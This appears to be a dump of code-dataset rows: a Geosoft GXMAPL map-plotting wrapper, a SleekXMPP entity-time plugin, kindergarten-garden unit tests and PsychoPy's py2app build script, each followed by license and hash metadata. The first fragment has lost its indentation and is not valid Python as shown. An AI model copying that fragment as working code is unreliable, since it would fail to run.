# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXMAPL(gxapi_cy.WrapMAPL):
"""
GXMAPL class.
The `GXMAPL <geosoft.gxapi.GXMAPL>` class is the interface with the MAPPLOT program,
which reads a MAPPLOT control file and plots graphical
entities to a map. The `GXMAPL <geosoft.gxapi.GXMAPL>` object is created for a given
control file, then passed to the MAPPLOT program, along
with the target `GXMAP <geosoft.gxapi.GXMAP>` object on which to do the drawing
"""
def __init__(self, handle=0):
super(GXMAPL, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXMAPL <geosoft.gxapi.GXMAPL>`
:returns: A null `GXMAPL <geosoft.gxapi.GXMAPL>`
:rtype: GXMAPL
"""
return GXMAPL()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Miscellaneous
@classmethod
def create(cls, name, ref_name, line):
"""
Create a `GXMAPL <geosoft.gxapi.GXMAPL>`.
:param name: `GXMAPL <geosoft.gxapi.GXMAPL>` file name
:param ref_name: Map base reference name
:param line: Start line number in file (0 is first)
:type name: str
:type ref_name: str
:type line: int
:returns: `GXMAPL <geosoft.gxapi.GXMAPL>`, aborts if creation fails
:rtype: GXMAPL
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The default map groups will use the reference name with
"_Data" and "_Base" added. If no reference name is specified,
the name "`GXMAPL <geosoft.gxapi.GXMAPL>`" is used
"""
ret_val = gxapi_cy.WrapMAPL._create(GXContext._get_tls_geo(), name.encode(), ref_name.encode(), line)
return GXMAPL(ret_val)
@classmethod
def create_reg(cls, name, ref_name, line, reg):
"""
Create a `GXMAPL <geosoft.gxapi.GXMAPL>` with `GXREG <geosoft.gxapi.GXREG>`.
:param name: `GXMAPL <geosoft.gxapi.GXMAPL>` file name
:param ref_name: Map base reference name
:param line: Start line number in file (0 is first)
:type name: str
:type ref_name: str
:type line: int
:type reg: GXREG
:returns: `GXMAPL <geosoft.gxapi.GXMAPL>`, aborts if creation fails
:rtype: GXMAPL
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The default map groups will use the reference name with
"_Data" and "_Base" added. If no reference name is specified,
the name "`GXMAPL <geosoft.gxapi.GXMAPL>`" is used
"""
ret_val = gxapi_cy.WrapMAPL._create_reg(GXContext._get_tls_geo(), name.encode(), ref_name.encode(), line, reg)
return GXMAPL(ret_val)
def process(self, map):
"""
Process a `GXMAPL <geosoft.gxapi.GXMAPL>`
:type map: GXMAP
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._process(map)
def replace_string(self, var, repl):
"""
Adds a replacement string to a mapplot control file.
:param var: Variable
:param repl: Replacement
:type var: str
:type repl: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._replace_string(var.encode(), repl.encode())
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer | bsd-2-clause | 6,101,702,230,829,206,000 | 29.303797 | 135 | 0.608105 | false | 3.481455 | false | false | false |
isandlaTech/cohorte-demos | led/dump/led-demo-raspberry/cohorte/dist/cohorte-1.0.0-20141209.234423-41-python-distribution/repo/sleekxmpp/plugins/xep_0202/time.py | 8 | 3106 | """
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import logging
from sleekxmpp.stanza.iq import Iq
from sleekxmpp.xmlstream import register_stanza_plugin
from sleekxmpp.xmlstream.handler import Callback
from sleekxmpp.xmlstream.matcher import StanzaPath
from sleekxmpp.plugins import BasePlugin
from sleekxmpp.plugins import xep_0082
from sleekxmpp.plugins.xep_0202 import stanza
log = logging.getLogger(__name__)
class XEP_0202(BasePlugin):
"""
XEP-0202: Entity Time
"""
name = 'xep_0202'
description = 'XEP-0202: Entity Time'
dependencies = set(['xep_0030', 'xep_0082'])
stanza = stanza
default_config = {
#: As a default, respond to time requests with the
#: local time returned by XEP-0082. However, a
#: custom function can be supplied which accepts
#: the JID of the entity to query for the time.
'local_time': None,
'tz_offset': 0
}
def plugin_init(self):
"""Start the XEP-0203 plugin."""
if not self.local_time:
def default_local_time(jid):
return xep_0082.datetime(offset=self.tz_offset)
self.local_time = default_local_time
self.xmpp.register_handler(
Callback('Entity Time',
StanzaPath('iq/entity_time'),
self._handle_time_request))
register_stanza_plugin(Iq, stanza.EntityTime)
def plugin_end(self):
self.xmpp['xep_0030'].del_feature(feature='urn:xmpp:time')
self.xmpp.remove_handler('Entity Time')
def session_bind(self, jid):
self.xmpp['xep_0030'].add_feature('urn:xmpp:time')
def _handle_time_request(self, iq):
"""
Respond to a request for the local time.
The time is taken from self.local_time(), which may be replaced
during plugin configuration with a function that maps JIDs to
times.
Arguments:
iq -- The Iq time request stanza.
"""
iq.reply()
iq['entity_time']['time'] = self.local_time(iq['to'])
iq.send()
def get_entity_time(self, to, ifrom=None, **iqargs):
"""
Request the time from another entity.
Arguments:
to -- JID of the entity to query.
ifrom -- Specifiy the sender's JID.
block -- If true, block and wait for the stanzas' reply.
timeout -- The time in seconds to block while waiting for
a reply. If None, then wait indefinitely.
callback -- Optional callback to execute when a reply is
received instead of blocking and waiting for
the reply.
"""
iq = self.xmpp.Iq()
iq['type'] = 'get'
iq['to'] = to
iq['from'] = ifrom
iq.enable('entity_time')
return iq.send(**iqargs)
| apache-2.0 | 7,519,437,295,183,417,000 | 29.693878 | 71 | 0.577592 | false | 3.916772 | false | false | false |
pheanex/xpython | exercises/kindergarten-garden/kindergarten_garden_test.py | 1 | 1974 | import unittest
from kindergarten_garden import Garden
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.0.0
class KindergartenGardenTests(unittest.TestCase):
def test_garden_with_single_student(self):
self.assertEqual(
Garden("RC\nGG").plants("Alice"),
"Radishes Clover Grass Grass".split())
def test_different_garden_with_single_student(self):
self.assertEqual(
Garden("VC\nRC").plants("Alice"),
"Violets Clover Radishes Clover".split())
def test_garden_with_two_students(self):
garden = Garden("VVCG\nVVRC")
self.assertEqual(
garden.plants("Bob"), "Clover Grass Radishes Clover".split())
def test_multiple_students_for_the_same_garden_with_three_students(self):
garden = Garden("VVCCGG\nVVCCGG")
self.assertEqual(garden.plants("Bob"), ["Clover"] * 4)
self.assertEqual(garden.plants("Charlie"), ["Grass"] * 4)
def test_full_garden(self):
garden = Garden("VRCGVVRVCGGCCGVRGCVCGCGV\nVRCCCGCRRGVCGCRVVCVGCGCV")
self.assertEqual(
garden.plants("Alice"),
"Violets Radishes Violets Radishes".split())
self.assertEqual(
garden.plants("Bob"), "Clover Grass Clover Clover".split())
self.assertEqual(
garden.plants("Kincaid"), "Grass Clover Clover Grass".split())
self.assertEqual(
garden.plants("Larry"), "Grass Violets Clover Violets".split())
# Additional tests for this track
def test_disordered_test(self):
garden = Garden(
"VCRRGVRG\nRVGCCGCV",
students="Samantha Patricia Xander Roger".split())
self.assertEqual(
garden.plants("Patricia"),
"Violets Clover Radishes Violets".split())
self.assertEqual(
garden.plants("Xander"), "Radishes Grass Clover Violets".split())
if __name__ == '__main__':
unittest.main()
| mit | -5,124,548,345,512,507,000 | 35.555556 | 77 | 0.629179 | false | 3.209756 | true | false | false |
hoechenberger/psychopy | setupApp.py | 1 | 6565 | #!/usr/bin/env python
################
# see notes at bottom for requirements
from __future__ import absolute_import, print_function
import glob
import os
import sys
from sys import platform
from distutils.core import setup
from pkg_resources import parse_version
# import versioneer
import psychopy
version = psychopy.__version__
# regenerate __init__.py only if we're in the source repos (not in a zip file)
try:
import createInitFile # won't exist in a sdist.zip
writeNewInit=True
except:
writeNewInit=False
if writeNewInit:
vStr = createInitFile.createInitFile(dist='bdist')
#define the extensions to compile if necess
packageData = []
requires = []
if platform != 'darwin':
raise RuntimeError("setupApp.py is only for building Mac Standalone bundle")
import bdist_mpkg
import py2app
resources = glob.glob('psychopy/app/Resources/*')
resources.append('/Library/Frameworks/Python.framework/Versions/2.7/include/python2.7/pyconfig.h')
frameworks = ["libavbin.dylib", "/usr/lib/libxml2.2.dylib", #"libyaml.dylib",
"libevent.dylib", "libffi.dylib",
"libmp3lame.0.dylib",
"/usr/local/Cellar/glfw/3.2.1/lib/libglfw.3.2.dylib",
]
opencvLibs = glob.glob(os.path.join(sys.exec_prefix, 'lib', 'libopencv*.2.4.dylib'))
frameworks.extend(opencvLibs)
import macholib
#print("~"*60 + "macholib version: "+macholib.__version__)
if parse_version(macholib.__version__) <= parse_version('1.7'):
print("Applying macholib patch...")
import macholib.dyld
import macholib.MachOGraph
dyld_find_1_7 = macholib.dyld.dyld_find
def dyld_find(name, loader=None, **kwargs):
#print("~"*60 + "calling alternate dyld_find")
if loader is not None:
kwargs['loader_path'] = loader
return dyld_find_1_7(name, **kwargs)
macholib.MachOGraph.dyld_find = dyld_find
includes = ['Tkinter', 'tkFileDialog',
'imp', 'subprocess', 'shlex',
'shelve', # for scipy.io
'_elementtree', 'pyexpat', # for openpyxl
'hid',
'pyo', 'greenlet', 'zmq', 'tornado',
'psutil', # for iohub
'pysoundcard', 'soundfile', 'sounddevice',
'cv2', 'hid',
'xlwt', # writes excel files for pandas
'vlc', # install with pip install python-vlc
'msgpack_numpy',
'configparser',
]
packages = ['wx', 'psychopy',
'pyglet', 'pygame', 'pytz', 'OpenGL', 'glfw',
'scipy', 'matplotlib', 'lxml', 'xml', 'openpyxl',
'moviepy', 'imageio',
'_sounddevice_data','_soundfile_data',
'cffi','pycparser',
'PIL', # 'Image',
'objc', 'Quartz', 'AppKit', 'QTKit', 'Cocoa',
'Foundation', 'CoreFoundation',
'pkg_resources', # needed for objc
'pyolib',
'requests', 'certifi', 'cryptography',
'pyosf',
# for unit testing
'coverage',
# handy external science libs
'serial',
'egi', 'pylink',
'pyxid',
'pandas', 'tables', # 'cython',
'msgpack', 'yaml', 'gevent', # for ioHub
# these aren't needed, but liked
'psychopy_ext', 'pyfilesec',
'bidi', 'arabic_reshaper', # for right-left language conversions
# for Py3 compatibility
'future', 'past', 'lib2to3',
'json_tricks', # allows saving arrays/dates in json
'git', 'gitlab',
'astunparse', 'esprima', # for translating/adapting py/JS
'pylsl', 'pygaze',
]
if sys.version_info.major >= 3:
packages.extend(['PyQt5'])
else:
# not available or not working under Python3:
includes.extend(['UserString', 'ioLabs', 'FileDialog'])
packages.extend(['PyQt4', 'labjack', 'rusocsci'])
# is available but py2app can't seem to find it:
packages.extend(['OpenGL'])
setup(
app=['psychopy/app/psychopyApp.py'],
options=dict(py2app=dict(
includes=includes,
packages=packages,
excludes=['bsddb', 'jinja2', 'IPython','ipython_genutils','nbconvert',
'libsz.2.dylib',
# 'stringprep',
'functools32',
], # anything we need to forcibly exclude?
resources=resources,
argv_emulation=True,
site_packages=True,
frameworks=frameworks,
iconfile='psychopy/app/Resources/psychopy.icns',
plist=dict(
CFBundleIconFile='psychopy.icns',
CFBundleName = "PsychoPy3",
CFBundleShortVersionString = version, # must be in X.X.X format
CFBundleGetInfoString = "PsychoPy3 "+version,
CFBundleExecutable = "PsychoPy3",
CFBundleIdentifier = "org.psychopy.PsychoPy3",
CFBundleLicense = "GNU GPLv3+",
CFBundleDocumentTypes=[dict(CFBundleTypeExtensions=['*'],
CFBundleTypeRole='Editor')],
LSEnvironment=dict(PATH="/usr/local/git/bin:/usr/local/bin:"
"/usr/local:/usr/bin:/usr/sbin"),
),
)) # end of the options dict
)
# ugly hack for opencv2:
# As of opencv 2.4.5 the cv2.so binary used rpath to a fixed
# location to find libs and even more annoyingly it then appended
# 'lib' to the rpath as well. These were fine for the packaged
# framework python but the libs in an app bundle are different.
# So, create symlinks so they appear in the same place as in framework python
rpath = "dist/PsychoPy3.app/Contents/Resources/"
for libPath in opencvLibs:
libname = os.path.split(libPath)[-1]
realPath = "../../Frameworks/"+libname # relative path (w.r.t. the fake)
fakePath = os.path.join(rpath, "lib", libname)
os.symlink(realPath, fakePath)
# they even did this for Python lib itself, which is in diff location
realPath = "../Frameworks/Python.framework/Python" # relative to the fake path
fakePath = os.path.join(rpath, "Python")
os.symlink(realPath, fakePath)
if writeNewInit:
# remove unwanted info about this system post-build
createInitFile.createInitFile(dist=None)
# running testApp from within the app raises wx errors
# shutil.rmtree("dist/PsychoPy3.app/Contents/Resources/lib/python2.6/psychopy/tests/testTheApp")
| gpl-3.0 | -2,791,599,011,250,994,700 | 38.311377 | 98 | 0.592232 | false | 3.64925 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.